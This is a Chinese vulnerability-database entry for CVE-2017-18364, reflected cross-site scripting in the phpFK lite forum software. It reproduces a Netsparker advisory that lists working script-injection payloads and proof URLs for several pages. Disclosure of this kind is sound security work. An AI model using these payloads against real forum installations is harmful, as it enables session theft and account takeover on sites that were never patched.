phpFK lite 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1553447 漏洞类型 跨站脚本
发布时间 2019-07-11 更新时间 2019-07-15
CVE编号 CVE-2017-18364 CNNVD-ID CNNVD-201903-1069
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019070053
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201903-1069
|漏洞详情
phpFK lite是一套使用PHP语言编写的论坛系统。 phpFK lite中存在跨站脚本漏洞。远程攻击者可利用该漏洞注入任意的Web脚本或HTML。
|漏洞EXP
*Information:*

Advisory by Netsparker
Name: Multiple Cross-site Scripting Vulnerabilities in phpFK
Affected Software: phpFK
Affected Versions: lite-version
Homepage: https://www.frank-karau.de/
Vulnerability: Reflected Cross-site Scripting
Severity: 7.4 High
Status: Not Fixed
CVSS Score (3.0): CVE-2017-18364
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-006

*Technical Details:*

/faq.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern :
'"--></style></scRipt><scRipt>netsparker(0x00164F)</scRipt>
Proof URL : http://
{domain}/faq.php?'"--></style></scRipt><scRipt>alert(0x00164F)</scRipt>

/members.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern :
'"--></style></scRipt><scRipt>netsparker(0x00158E)</scRipt>
Proof URL : http://
{domain}/members.php?'"--></style></scRipt><scRipt>alert(0x00158E)</scRipt>

/members.php (search (GET))

Parameter Name : search
Parameter Type : GET
Attack Pattern : x%22+onmouseover%3dnetsparker(0x0069A0)+x%3d%22
Proof URL : http://
{domain}/members.php?search=x"%20onmouseover=netsparker(0x0069A0)%20x="&sort=username

/members.php (search (POST))

Parameter Name : search
Parameter Type : POST
Attack Pattern : x%22+onmouseover%3dnetsparker(0x006EBA)+x%3d%22

/search.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern : '"--></style></scRipt><scRipt>netsparker(0x00171D)</scRipt>
Proof URL : http://
{domain}/search.php?'"--></style></scRipt><scRipt>alert(0x00171D)</scRipt>

/user.php (user (GET))

Parameter Name : user
Parameter Type : GET
Attack Pattern :
%3c%2ftitle%3e%3cscRipt%3enetsparker(0x001122)%3c%2fscRipt%3e
Proof URL : http://
{domain}/user.php?user=</title><scRipt>netsparker(0x001122)</scRipt>

For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-006-reflected-cross-site-scripting-in-phpfk/

|参考资料

来源:www.netsparker.com

链接:https://www.netsparker.com/web-applications-advisories/ns-17-030-multiple-reflected-xss-vulnerabilities-in-phpfkl-lite/


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2017-18364